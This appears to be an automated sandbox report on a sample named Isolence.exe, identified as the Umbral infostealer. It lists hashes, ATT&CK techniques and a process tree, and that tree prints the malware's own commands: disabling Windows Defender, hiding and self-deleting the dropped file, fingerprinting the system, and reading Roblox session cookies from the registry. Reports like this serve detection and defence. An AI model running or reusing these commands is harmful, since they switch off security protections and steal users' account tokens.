Overview

overview

10

Static

static

3

Isolence.exe

windows7-x64

10

Isolence.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    131s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2024 04:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Isolence.exe

  • Size

    402KB

  • MD5

    87e7cabc378978827ad35f11a7e3d311

  • SHA1

    eebf169bc83f6809229a8e2bd7925f99c216842f

  • SHA256

    441d5ad14a8d62643e2fe09046f6afe5b04b045c89dc3b213fcb695d5faa0063

  • SHA512

    2893da6232254d14d8038529e636f8178ef0b2143f640e6655de9186635b545d19713c843409840f8a1807adfe9ef10c344a42d448c9d71663f988d29467f039

  • SSDEEP

    6144:Vqg1BFe479zdJQxMh1PLm1Puu24ZmlLKSCbOymoeFKJCTownhl4K/X:Vx247OGQ3Z+WS2eVPnv4Kv

Score
10/10
umbralcredential_accessdefense_evasiondiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Isolence.exe
    "C:\Users\Admin\AppData\Local\Temp\Isolence.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3908
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdABxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgBlAHMAdABhAHIAdAAgAHAAYwAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAZABpAGIAIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3396
    • C:\Users\Admin\AppData\Local\Temp\insolence.exe
      "C:\Users\Admin\AppData\Local\Temp\insolence.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\insolence.exe"
        3⤵
        • Views/modifies file attributes
        PID:1736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\insolence.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4424
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4116
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:4436
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:4384
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4208
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:4156
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\insolence.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:4608
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:3884
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4768,i,2904906934812054273,11716976550456127484,262144 --variations-seed-version --mojo-platform-channel-handle=1420 /prefetch:8
        1⤵
          PID:4476

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Persistence

        Privilege Escalation

        Defense Evasion

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Obfuscated Files or Information

        1
        T1027

        Command Obfuscation

        1
        T1027.010

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Query Registry

        1
        T1012

        Remote System Discovery

        1
        T1018

        System Information Discovery

        3
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          7164c3d7c57ebbaec233482f2e1cc1f1

          SHA1

          a767f48a2a10c216470d0782100828f0bed91579

          SHA256

          65ca843513f0f6ee03ae9b357fd6fea801a17ffe23c8a04777f8f06a5f0206ae

          SHA512

          bc09ee737727408fa5a969a6eb2be0be83d521e4f3f6c0567e4caa28f09de2794d413fbef52a5a7243fb49005d69ab56052ce417440d07beadbc6684cb362951

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          17KB

          MD5

          7de15706fa6fa46ecdb8a82ac79037db

          SHA1

          b0bc03d1e6cfcb416d174bde136504170f272fb8

          SHA256

          bdb5c949b53916eb335adf5bc611f5ff3627abbfcdb54e3b0c2b64e92bf41d34

          SHA512

          bb8502762e580539478ca816d25fa2126899da32bbb488ef43d50cd7587e7890014c80eec80372340694dd7bb7aba3069d2215a3e087c08e1b3b10cc7102871a

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          948B

          MD5

          966914e2e771de7a4a57a95b6ecfa8a9

          SHA1

          7a32282fd51dd032967ed4d9a40cc57e265aeff2

          SHA256

          98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

          SHA512

          dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          276798eeb29a49dc6e199768bc9c2e71

          SHA1

          5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

          SHA256

          cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

          SHA512

          0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ctfv4kuo.wgs.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\insolence.exe
          Filesize

          229KB

          MD5

          7553d23f56459f7a00e0c4d0bafaf675

          SHA1

          625bed675494bcba3860b57680bef8e09ba7429d

          SHA256

          d385a83b02ae2e7a2357a17abaa909406a88ad720faee797ad3fb11bdcc31200

          SHA512

          a577a2c02960b8fdb4614cf41cbde3da6e22f548e2a100885f58d763cb5c38893a21d07ebdc2046890e0cb9fcede09f7dd935d713e35ae184d679766c9ac3b41

          Download Submit

        • memory/3396-15-0x0000000002A40000-0x0000000002A50000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3396-33-0x0000000005FE0000-0x000000000602C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3396-21-0x0000000005990000-0x00000000059F6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/3396-20-0x00000000058B0000-0x0000000005916000-memory.dmp

          Filesize

          408KB

          Download

        • memory/3396-19-0x00000000752C0000-0x0000000075A70000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/3396-31-0x0000000005A00000-0x0000000005D54000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/3396-32-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3396-18-0x0000000005730000-0x0000000005752000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3396-17-0x0000000005100000-0x0000000005728000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/3396-46-0x00000000075F0000-0x0000000007C6A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/3396-47-0x00000000064F0000-0x000000000650A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3396-16-0x00000000752CE000-0x00000000752CF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3396-13-0x00000000029D0000-0x0000000002A06000-memory.dmp

          Filesize

          216KB

          Download

        • memory/3396-59-0x0000000008220000-0x00000000087C4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/3396-61-0x0000000007390000-0x0000000007422000-memory.dmp

          Filesize

          584KB

          Download

        • memory/3396-117-0x00000000752C0000-0x0000000075A70000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/3712-65-0x000001DA710C0000-0x000001DA71110000-memory.dmp

          Filesize

          320KB

          Download

        • memory/3712-66-0x000001DA71090000-0x000001DA710AE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/3712-64-0x000001DA71110000-0x000001DA71186000-memory.dmp

          Filesize

          472KB

          Download

        • memory/3712-99-0x000001DA711A0000-0x000001DA711AA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3712-100-0x000001DA711D0000-0x000001DA711E2000-memory.dmp

          Filesize

          72KB

          Download

        • memory/3712-14-0x00007FF9CDE80000-0x00007FF9CE941000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3712-12-0x00007FF9CDE83000-0x00007FF9CDE85000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3712-11-0x000001DA569E0000-0x000001DA56A20000-memory.dmp

          Filesize

          256KB

          Download

        • memory/3712-122-0x00007FF9CDE80000-0x00007FF9CE941000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4584-39-0x00000266EB100000-0x00000266EB122000-memory.dmp

          Filesize

          136KB

          Download